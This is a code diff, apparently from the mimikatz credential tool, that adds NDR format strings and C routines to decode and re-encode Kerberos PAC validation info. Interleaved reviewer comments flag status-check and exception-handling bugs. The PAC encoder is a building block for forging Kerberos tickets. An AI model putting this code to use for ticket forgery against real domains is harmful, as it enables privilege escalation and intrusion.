/* 150 */ NdrFcShort( 0x3a ), /* 58 */
/* 152 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 154 */ 0x17, /* Corr desc: field pointer, FC_USHORT */
0x55, /* FC_DIV_2 */
/* 156 */ NdrFcShort( 0x38 ), /* 56 */
/* 158 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 160 */ 0x5, /* FC_WCHAR */
0x5b, /* FC_END */
/* 162 */
0x1c, /* FC_CVARRAY */
0x1, /* 1 */
/* 164 */ NdrFcShort( 0x2 ), /* 2 */
/* 166 */ 0x17, /* Corr desc: field pointer, FC_USHORT */
0x55, /* FC_DIV_2 */
/* 168 */ NdrFcShort( 0x42 ), /* 66 */
/* 170 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 172 */ 0x17, /* Corr desc: field pointer, FC_USHORT */
0x55, /* FC_DIV_2 */
/* 174 */ NdrFcShort( 0x40 ), /* 64 */
/* 176 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 178 */ 0x5, /* FC_WCHAR */
0x5b, /* FC_END */
/* 180 */
0x1c, /* FC_CVARRAY */
0x1, /* 1 */
/* 182 */ NdrFcShort( 0x2 ), /* 2 */
/* 184 */ 0x17, /* Corr desc: field pointer, FC_USHORT */
0x55, /* FC_DIV_2 */
/* 186 */ NdrFcShort( 0x4a ), /* 74 */
/* 188 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 190 */ 0x17, /* Corr desc: field pointer, FC_USHORT */
0x55, /* FC_DIV_2 */
/* 192 */ NdrFcShort( 0x48 ), /* 72 */
/* 194 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 196 */ 0x5, /* FC_WCHAR */
0x5b, /* FC_END */
/* 198 */
0x1c, /* FC_CVARRAY */
0x1, /* 1 */
/* 200 */ NdrFcShort( 0x2 ), /* 2 */
/* 202 */ 0x17, /* Corr desc: field pointer, FC_USHORT */
0x55, /* FC_DIV_2 */
/* 204 */ NdrFcShort( 0x52 ), /* 82 */
/* 206 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 208 */ 0x17, /* Corr desc: field pointer, FC_USHORT */
0x55, /* FC_DIV_2 */
/* 210 */ NdrFcShort( 0x50 ), /* 80 */
/* 212 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 214 */ 0x5, /* FC_WCHAR */
0x5b, /* FC_END */
/* 216 */
0x1c, /* FC_CVARRAY */
0x1, /* 1 */
/* 218 */ NdrFcShort( 0x2 ), /* 2 */
/* 220 */ 0x17, /* Corr desc: field pointer, FC_USHORT */
0x55, /* FC_DIV_2 */
/* 222 */ NdrFcShort( 0x5a ), /* 90 */
/* 224 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 226 */ 0x17, /* Corr desc: field pointer, FC_USHORT */
0x55, /* FC_DIV_2 */
/* 228 */ NdrFcShort( 0x58 ), /* 88 */
/* 230 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 232 */ 0x5, /* FC_WCHAR */
0x5b, /* FC_END */
/* 234 */
0x1b, /* FC_CARRAY */
0x3, /* 3 */
/* 236 */ NdrFcShort( 0x8 ), /* 8 */
/* 238 */ 0x19, /* Corr desc: field pointer, FC_ULONG */
0x0, /* */
/* 240 */ NdrFcShort( 0x6c ), /* 108 */
/* 242 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 244 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 246 */ NdrFcShort( 0xff76 ), /* Offset= -138 (108) */
/* 248 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 250 */
0x1c, /* FC_CVARRAY */
0x1, /* 1 */
/* 252 */ NdrFcShort( 0x2 ), /* 2 */
/* 254 */ 0x17, /* Corr desc: field pointer, FC_USHORT */
0x55, /* FC_DIV_2 */
/* 256 */ NdrFcShort( 0x8a ), /* 138 */
/* 258 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 260 */ 0x17, /* Corr desc: field pointer, FC_USHORT */
0x55, /* FC_DIV_2 */
/* 262 */ NdrFcShort( 0x88 ), /* 136 */
/* 264 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 266 */ 0x5, /* FC_WCHAR */
0x5b, /* FC_END */
/* 268 */
0x1c, /* FC_CVARRAY */
0x1, /* 1 */
/* 270 */ NdrFcShort( 0x2 ), /* 2 */
/* 272 */ 0x17, /* Corr desc: field pointer, FC_USHORT */
0x55, /* FC_DIV_2 */
/* 274 */ NdrFcShort( 0x92 ), /* 146 */
/* 276 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 278 */ 0x17, /* Corr desc: field pointer, FC_USHORT */
0x55, /* FC_DIV_2 */
/* 280 */ NdrFcShort( 0x90 ), /* 144 */
/* 282 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 284 */ 0x5, /* FC_WCHAR */
0x5b, /* FC_END */
/* 286 */
0x1b, /* FC_CARRAY */
0x3, /* 3 */
/* 288 */ NdrFcShort( 0x8 ), /* 8 */
/* 290 */ 0x19, /* Corr desc: field pointer, FC_ULONG */
0x0, /* */
/* 292 */ NdrFcShort( 0xc4 ), /* 196 */
/* 294 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 296 */
0x4b, /* FC_PP */
0x5c, /* FC_PAD */
/* 298 */
0x48, /* FC_VARIABLE_REPEAT */
0x49, /* FC_FIXED_OFFSET */
/* 300 */ NdrFcShort( 0x8 ), /* 8 */
/* 302 */ NdrFcShort( 0x0 ), /* 0 */
/* 304 */ NdrFcShort( 0x1 ), /* 1 */
/* 306 */ NdrFcShort( 0x0 ), /* 0 */
/* 308 */ NdrFcShort( 0x0 ), /* 0 */
/* 310 */ 0x12, 0x0, /* FC_UP */
/* 312 */ NdrFcShort( 0xfeea ), /* Offset= -278 (34) */
/* 314 */
0x5b, /* FC_END */
0x4c, /* FC_EMBEDDED_COMPLEX */
/* 316 */ 0x0, /* 0 */
NdrFcShort( 0xff17 ), /* Offset= -233 (84) */
0x5b, /* FC_END */
/* 320 */
0x1b, /* FC_CARRAY */
0x3, /* 3 */
/* 322 */ NdrFcShort( 0x8 ), /* 8 */
/* 324 */ 0x19, /* Corr desc: field pointer, FC_ULONG */
0x0, /* */
/* 326 */ NdrFcShort( 0xd0 ), /* 208 */
/* 328 */ NdrFcShort( 0x1 ), /* Corr flags: early, */
/* 330 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 332 */ NdrFcShort( 0xff20 ), /* Offset= -224 (108) */
/* 334 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 336 */
0x16, /* FC_PSTRUCT */
0x3, /* 3 */
/* 338 */ NdrFcShort( 0xd8 ), /* 216 */
/* 340 */
0x4b, /* FC_PP */
0x5c, /* FC_PAD */
/* 342 */
0x46, /* FC_NO_REPEAT */
0x5c, /* FC_PAD */
/* 344 */ NdrFcShort( 0x34 ), /* 52 */
/* 346 */ NdrFcShort( 0x34 ), /* 52 */
/* 348 */ 0x12, 0x0, /* FC_UP */
/* 350 */ NdrFcShort( 0xff20 ), /* Offset= -224 (126) */
/* 352 */
0x46, /* FC_NO_REPEAT */
0x5c, /* FC_PAD */
/* 354 */ NdrFcShort( 0x3c ), /* 60 */
/* 356 */ NdrFcShort( 0x3c ), /* 60 */
/* 358 */ 0x12, 0x0, /* FC_UP */
/* 360 */ NdrFcShort( 0xff28 ), /* Offset= -216 (144) */
/* 362 */
0x46, /* FC_NO_REPEAT */
0x5c, /* FC_PAD */
/* 364 */ NdrFcShort( 0x44 ), /* 68 */
/* 366 */ NdrFcShort( 0x44 ), /* 68 */
/* 368 */ 0x12, 0x0, /* FC_UP */
/* 370 */ NdrFcShort( 0xff30 ), /* Offset= -208 (162) */
/* 372 */
0x46, /* FC_NO_REPEAT */
0x5c, /* FC_PAD */
/* 374 */ NdrFcShort( 0x4c ), /* 76 */
/* 376 */ NdrFcShort( 0x4c ), /* 76 */
/* 378 */ 0x12, 0x0, /* FC_UP */
/* 380 */ NdrFcShort( 0xff38 ), /* Offset= -200 (180) */
/* 382 */
0x46, /* FC_NO_REPEAT */
0x5c, /* FC_PAD */
/* 384 */ NdrFcShort( 0x54 ), /* 84 */
/* 386 */ NdrFcShort( 0x54 ), /* 84 */
/* 388 */ 0x12, 0x0, /* FC_UP */
/* 390 */ NdrFcShort( 0xff40 ), /* Offset= -192 (198) */
/* 392 */
0x46, /* FC_NO_REPEAT */
0x5c, /* FC_PAD */
/* 394 */ NdrFcShort( 0x5c ), /* 92 */
/* 396 */ NdrFcShort( 0x5c ), /* 92 */
/* 398 */ 0x12, 0x0, /* FC_UP */
/* 400 */ NdrFcShort( 0xff48 ), /* Offset= -184 (216) */
/* 402 */
0x46, /* FC_NO_REPEAT */
0x5c, /* FC_PAD */
/* 404 */ NdrFcShort( 0x70 ), /* 112 */
/* 406 */ NdrFcShort( 0x70 ), /* 112 */
/* 408 */ 0x12, 0x0, /* FC_UP */
/* 410 */ NdrFcShort( 0xff50 ), /* Offset= -176 (234) */
/* 412 */
0x46, /* FC_NO_REPEAT */
0x5c, /* FC_PAD */
/* 414 */ NdrFcShort( 0x8c ), /* 140 */
/* 416 */ NdrFcShort( 0x8c ), /* 140 */
/* 418 */ 0x12, 0x0, /* FC_UP */
/* 420 */ NdrFcShort( 0xff56 ), /* Offset= -170 (250) */
/* 422 */
0x46, /* FC_NO_REPEAT */
0x5c, /* FC_PAD */
/* 424 */ NdrFcShort( 0x94 ), /* 148 */
/* 426 */ NdrFcShort( 0x94 ), /* 148 */
/* 428 */ 0x12, 0x0, /* FC_UP */
/* 430 */ NdrFcShort( 0xff5e ), /* Offset= -162 (268) */
/* 432 */
0x46, /* FC_NO_REPEAT */
0x5c, /* FC_PAD */
/* 434 */ NdrFcShort( 0x98 ), /* 152 */
/* 436 */ NdrFcShort( 0x98 ), /* 152 */
/* 438 */ 0x12, 0x0, /* FC_UP */
/* 440 */ NdrFcShort( 0xfe6a ), /* Offset= -406 (34) */
/* 442 */
0x46, /* FC_NO_REPEAT */
0x5c, /* FC_PAD */
/* 444 */ NdrFcShort( 0xc8 ), /* 200 */
/* 446 */ NdrFcShort( 0xc8 ), /* 200 */
/* 448 */ 0x12, 0x0, /* FC_UP */
/* 450 */ NdrFcShort( 0xff5c ), /* Offset= -164 (286) */
/* 452 */
0x46, /* FC_NO_REPEAT */
0x5c, /* FC_PAD */
/* 454 */ NdrFcShort( 0xcc ), /* 204 */
/* 456 */ NdrFcShort( 0xcc ), /* 204 */
/* 458 */ 0x12, 0x0, /* FC_UP */
/* 460 */ NdrFcShort( 0xfe56 ), /* Offset= -426 (34) */
/* 462 */
0x46, /* FC_NO_REPEAT */
0x5c, /* FC_PAD */
/* 464 */ NdrFcShort( 0xd4 ), /* 212 */
/* 466 */ NdrFcShort( 0xd4 ), /* 212 */
/* 468 */ 0x12, 0x0, /* FC_UP */
/* 470 */ NdrFcShort( 0xff6a ), /* Offset= -150 (320) */
/* 472 */
0x5b, /* FC_END */
0x4c, /* FC_EMBEDDED_COMPLEX */
/* 474 */ 0x0, /* 0 */
NdrFcShort( 0xfe91 ), /* Offset= -367 (108) */
0x4c, /* FC_EMBEDDED_COMPLEX */
/* 478 */ 0x0, /* 0 */
NdrFcShort( 0xfe8d ), /* Offset= -371 (108) */
0x4c, /* FC_EMBEDDED_COMPLEX */
/* 482 */ 0x0, /* 0 */
NdrFcShort( 0xfe89 ), /* Offset= -375 (108) */
0x4c, /* FC_EMBEDDED_COMPLEX */
/* 486 */ 0x0, /* 0 */
NdrFcShort( 0xfe85 ), /* Offset= -379 (108) */
0x4c, /* FC_EMBEDDED_COMPLEX */
/* 490 */ 0x0, /* 0 */
NdrFcShort( 0xfe81 ), /* Offset= -383 (108) */
0x4c, /* FC_EMBEDDED_COMPLEX */
/* 494 */ 0x0, /* 0 */
NdrFcShort( 0xfe7d ), /* Offset= -387 (108) */
0x6, /* FC_SHORT */
/* 498 */ 0x6, /* FC_SHORT */
0x8, /* FC_LONG */
/* 500 */ 0x6, /* FC_SHORT */
0x6, /* FC_SHORT */
/* 502 */ 0x8, /* FC_LONG */
0x6, /* FC_SHORT */
/* 504 */ 0x6, /* FC_SHORT */
0x8, /* FC_LONG */
/* 506 */ 0x6, /* FC_SHORT */
0x6, /* FC_SHORT */
/* 508 */ 0x8, /* FC_LONG */
0x6, /* FC_SHORT */
/* 510 */ 0x6, /* FC_SHORT */
0x8, /* FC_LONG */
/* 512 */ 0x6, /* FC_SHORT */
0x6, /* FC_SHORT */
/* 514 */ 0x8, /* FC_LONG */
0x6, /* FC_SHORT */
/* 516 */ 0x6, /* FC_SHORT */
0x8, /* FC_LONG */
/* 518 */ 0x8, /* FC_LONG */
0x8, /* FC_LONG */
/* 520 */ 0x8, /* FC_LONG */
0x8, /* FC_LONG */
/* 522 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 524 */ NdrFcShort( 0xfe3e ), /* Offset= -450 (74) */
/* 526 */ 0x6, /* FC_SHORT */
0x6, /* FC_SHORT */
/* 528 */ 0x8, /* FC_LONG */
0x6, /* FC_SHORT */
/* 530 */ 0x6, /* FC_SHORT */
0x8, /* FC_LONG */
/* 532 */ 0x8, /* FC_LONG */
0x4c, /* FC_EMBEDDED_COMPLEX */
/* 534 */ 0x0, /* 0 */
NdrFcShort( 0xfe61 ), /* Offset= -415 (120) */
0x8, /* FC_LONG */
/* 538 */ 0x8, /* FC_LONG */
0x4c, /* FC_EMBEDDED_COMPLEX */
/* 540 */ 0x0, /* 0 */
NdrFcShort( 0xfe4f ), /* Offset= -433 (108) */
0x4c, /* FC_EMBEDDED_COMPLEX */
/* 544 */ 0x0, /* 0 */
NdrFcShort( 0xfe4b ), /* Offset= -437 (108) */
0x8, /* FC_LONG */
/* 548 */ 0x8, /* FC_LONG */
0x8, /* FC_LONG */
/* 550 */ 0x8, /* FC_LONG */
0x8, /* FC_LONG */
/* 552 */ 0x8, /* FC_LONG */
0x8, /* FC_LONG */
/* 554 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 556 */
0x12, 0x0, /* FC_UP */
/* 558 */ NdrFcShort( 0xff22 ), /* Offset= -222 (336) */
0x0
}
};
#endif
#if _MSC_VER >= 1200
#pragma warning(pop)
#endif


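--- /dev/null
+++ b/modules/rpc/kull_m_rpc_ms-pac.h
@@ -0,0 +1,53 @@
+#pragma once
+#include "kull_m_rpc.h"
+#include "../kull_m_samlib.h"
+typedef struct _KERB_SID_AND_ATTRIBUTES
+{
+PISID Sid;
+ULONG Attributes;
+} KERB_SID_AND_ATTRIBUTES, *PKERB_SID_AND_ATTRIBUTES;
+typedef struct _KERB_VALIDATION_INFO
+{
+FILETIME LogonTime;
+FILETIME LogoffTime;
+FILETIME KickOffTime;
+FILETIME PasswordLastSet;
+FILETIME PasswordCanChange;
+FILETIME PasswordMustChange;
+RPC_UNICODE_STRING EffectiveName;
+RPC_UNICODE_STRING FullName;
+RPC_UNICODE_STRING LogonScript;
+RPC_UNICODE_STRING ProfilePath;
+RPC_UNICODE_STRING HomeDirectory;
+RPC_UNICODE_STRING HomeDirectoryDrive;
+USHORT LogonCount;
+USHORT BadPasswordCount;
+ULONG UserId;
+ULONG PrimaryGroupId;
+ULONG GroupCount;
+/* [size_is] */ PGROUP_MEMBERSHIP GroupIds;
+ULONG UserFlags;
+USER_SESSION_KEY UserSessionKey;
+RPC_UNICODE_STRING LogonServer;
+RPC_UNICODE_STRING LogonDomainName;
+PISID LogonDomainId;
+ULONG Reserved1[ 2 ];
+ULONG UserAccountControl;
+ULONG SubAuthStatus;
+FILETIME LastSuccessfulILogon;
+FILETIME LastFailedILogon;
+ULONG FailedILogonCount;
+ULONG Reserved3;
+ULONG SidCount;
+/* [size_is] */ PKERB_SID_AND_ATTRIBUTES ExtraSids;
+PISID ResourceGroupDomainSid;
+ULONG ResourceGroupCount;
+/* [size_is] */ PGROUP_MEMBERSHIP ResourceGroupIds;
+} KERB_VALIDATION_INFO, *PKERB_VALIDATION_INFO;
+size_t PKERB_VALIDATION_INFO_AlignSize(handle_t _MidlEsHandle, PKERB_VALIDATION_INFO * _pType);
+void PKERB_VALIDATION_INFO_Encode(handle_t _MidlEsHandle, PKERB_VALIDATION_INFO * _pType);
+void PKERB_VALIDATION_INFO_Decode(handle_t _MidlEsHandle, PKERB_VALIDATION_INFO * _pType);
+void PKERB_VALIDATION_INFO_Free(handle_t _MidlEsHandle, PKERB_VALIDATION_INFO * _pType);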
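Review bot: The three `/* [size_is] */` comments on `GroupIds`, `ExtraSids` and `ResourceGroupIds` do not say which field carries the element count, so a reader of this header cannot tell how far each array may be walked after a decode. The conformance descriptors in the x64 type format string for this structure reference the fields at offsets 156, 272 and 296, which in this layout are `GroupCount`, `SidCount` and `ResourceGroupCount`, so I would spell the comments out as `/* [size_is(GroupCount)] */ PGROUP_MEMBERSHIP GroupIds;`, `/* [size_is(SidCount)] */ PKERB_SID_AND_ATTRIBUTES ExtraSids;` and `/* [size_is(ResourceGroupCount)] */ PGROUP_MEMBERSHIP ResourceGroupIds;`. Since this structure is populated from a PAC blob handed in by the caller, a one-line note above the typedef that the counts and pointers are decoder output from untrusted data, and must not be trusted beyond what the caller has verified about the PAC, would help the next maintainer.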


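--- /dev/null
+++ b/modules/rpc/kull_m_rpc_pac.c
@@ -0,0 +1,84 @@
+/* Benjamin DELPY `gentilkiwi`
+http://blog.gentilkiwi.com
+benjamin@gentilkiwi.com
+Licence : https://creativecommons.org/licenses/by/4.0/
+*/
+#include "kull_m_rpc_pac.h"
+BOOL kuhl_m_pac_DecodeValidationInformation(PVOID data, DWORD size, PKERB_VALIDATION_INFO *pObject)
+{
+BOOL status = FALSE;
+RPC_STATUS rpcStatus;
+KULL_M_RPC_FCNSTRUCT UserState = {data, size};
+handle_t pHandle;
+*pObject = NULL;
+rpcStatus = MesDecodeIncrementalHandleCreate(&UserState, ReadFcn, &pHandle);
+if(NT_SUCCESS(rpcStatus))
+{
+rpcStatus = MesIncrementalHandleReset(pHandle, NULL, NULL, NULL, NULL, MES_DECODE);
+if(NT_SUCCESS(rpcStatus))
+{
+RpcTryExcept
+PKERB_VALIDATION_INFO_Decode(pHandle, pObject);
+status = (*pObject != NULL);
+RpcExcept(RPC_EXCEPTION)
+PRINT_ERROR(L"RPC Exception 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
+RpcEndExcept
+}
+else PRINT_ERROR(L"MesIncrementalHandleReset: %08x\n", rpcStatus);
+MesHandleFree(pHandle);
+}
+else PRINT_ERROR(L"MesDecodeIncrementalHandleCreate: %08x\n", rpcStatus);
+return status;
+}
+void kuhl_m_pac_FreeValidationInformation(PKERB_VALIDATION_INFO *pObject)
+{
+RPC_STATUS rpcStatus;
+handle_t pHandle;
+rpcStatus = MesDecodeIncrementalHandleCreate(NULL, NULL, &pHandle);
+if(NT_SUCCESS(rpcStatus))
+{
+PKERB_VALIDATION_INFO_Free(pHandle, pObject);
+*pObject = NULL;
+MesHandleFree(pHandle);
+}
+else PRINT_ERROR(L"MesDecodeIncrementalHandleCreate: %08x\n", rpcStatus);
+}
+BOOL kuhl_m_pac_EncodeValidationInformation(PKERB_VALIDATION_INFO pObject, PVOID *data, DWORD *size)
+{
+BOOL status = FALSE;
+RPC_STATUS rpcStatus;
+KULL_M_RPC_FCNSTRUCT UserState;
+handle_t pHandle;
+rpcStatus = MesEncodeIncrementalHandleCreate(&UserState, ReadFcn, WriteFcn, &pHandle);
+if(NT_SUCCESS(rpcStatus))
+{
+*size = (DWORD) PKERB_VALIDATION_INFO_AlignSize(pHandle, &pObject);
+if(*data = LocalAlloc(LPTR, *size))
+{
+rpcStatus = MesIncrementalHandleReset(pHandle, NULL, NULL, NULL, NULL, MES_ENCODE);
+if(NT_SUCCESS(rpcStatus))
+{
+UserState.addr = *data;
+UserState.size = *size;
+PKERB_VALIDATION_INFO_Encode(pHandle, &pObject);
+status = TRUE;
+}
+else PRINT_ERROR(L"MesIncrementalHandleReset: %08x\n", rpcStatus);
+if(!status)
+{
+*data = LocalFree(*data);
+*size = 0;
+}
+}
+MesHandleFree(pHandle);
+}
+else PRINT_ERROR(L"MesEncodeIncrementalHandleCreate: %08x\n", rpcStatus);
+return status;
+}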
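Review bot: Every `if(NT_SUCCESS(rpcStatus))` in this file tests an `RPC_STATUS`, and that macro only looks at the sign bit: the Mes* pickling calls return RPC_S_* codes, which are Win32 error values (RPC_S_OK is 0, RPC_S_OUT_OF_MEMORY and RPC_S_INVALID_ARG are small positive numbers), so a failed `MesDecodeIncrementalHandleCreate`, `MesEncodeIncrementalHandleCreate` or `MesIncrementalHandleReset` is taken as success and the code goes on to decode, free or encode through a handle that was never created. All five checks should read `if(rpcStatus == RPC_S_OK)`; the `%08x` error prints can stay. A second gap is in `kuhl_m_pac_EncodeValidationInformation`: the decoder wraps `PKERB_VALIDATION_INFO_Decode` in `RpcTryExcept`, but `PKERB_VALIDATION_INFO_AlignSize` and `PKERB_VALIDATION_INFO_Encode` run unguarded although the NDR pickling routines report failure by raising, so an exception there leaves the function with the pickling handle and the `LocalAlloc` buffer still live and `*data`/`*size` never assigned for the caller. The sketch below guards the encoder the same way as the decoder and initialises the out-parameters up front so the existing cleanup also runs on the exception path.

```c
BOOL kuhl_m_pac_EncodeValidationInformation(PKERB_VALIDATION_INFO pObject, PVOID *data, DWORD *size)
{
	/* … unchanged: locals … */
	*data = NULL;
	*size = 0;
	rpcStatus = MesEncodeIncrementalHandleCreate(&UserState, ReadFcn, WriteFcn, &pHandle);
	if(rpcStatus == RPC_S_OK) /* not NT_SUCCESS(): RPC_S_* failure codes are positive */
	{
		RpcTryExcept
			*size = (DWORD) PKERB_VALIDATION_INFO_AlignSize(pHandle, &pObject);
			if(*data = LocalAlloc(LPTR, *size))
			{
				rpcStatus = MesIncrementalHandleReset(pHandle, NULL, NULL, NULL, NULL, MES_ENCODE);
				if(rpcStatus == RPC_S_OK)
				{
					/* … unchanged: point UserState at *data/*size, encode, status = TRUE … */
				}
				else PRINT_ERROR(L"MesIncrementalHandleReset: %08x\n", rpcStatus);
			}
		RpcExcept(RPC_EXCEPTION)
			PRINT_ERROR(L"RPC Exception 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
		RpcEndExcept
		if(!status)
		{
			*data = LocalFree(*data); /* LocalFree(NULL) is a no-op, so this covers the AlignSize failure too */
			*size = 0;
		}
		MesHandleFree(pHandle);
	}
	else PRINT_ERROR(L"MesEncodeIncrementalHandleCreate: %08x\n", rpcStatus);
	return status;
}
```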


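--- /dev/null
+++ b/modules/rpc/kull_m_rpc_pac.h
@@ -0,0 +1,12 @@
+/* Benjamin DELPY `gentilkiwi`
+http://blog.gentilkiwi.com
+benjamin@gentilkiwi.com
+Licence : https://creativecommons.org/licenses/by/4.0/
+*/
+#pragma once
+#include "globals.h"
+#include "kull_m_rpc_ms-pac.h"
+BOOL kuhl_m_pac_DecodeValidationInformation(PVOID data, DWORD size, PKERB_VALIDATION_INFO *pObject);
+void kuhl_m_pac_FreeValidationInformation(PKERB_VALIDATION_INFO *pObject);
+BOOL kuhl_m_pac_EncodeValidationInformation(PKERB_VALIDATION_INFO pObject, PVOID *data, DWORD *size);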
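Review bot: The three prototypes carry no ownership contract, and the two directions allocate differently: the decoder hands back a structure built by the NDR pickling allocator that has to go back through `kuhl_m_pac_FreeValidationInformation`, while the encoder returns a buffer obtained with `LocalAlloc` that the caller must release with `LocalFree`, and nothing in this header says so. I would put one comment above each declaration: `// Decodes an NDR-pickled KERB_VALIDATION_INFO from data[0..size); on success *pObject is owned by the caller and must be released with kuhl_m_pac_FreeValidationInformation, on failure it is NULL`, `// Releases a structure returned by kuhl_m_pac_DecodeValidationInformation and sets *pObject to NULL`, and `// Pickles pObject into a freshly LocalAlloc'd buffer returned in *data/*size; the caller releases it with LocalFree`. Since `data` is a PAC logon-info blob, the decoder comment should also say the input is treated as untrusted and is only read within the `size` bytes given.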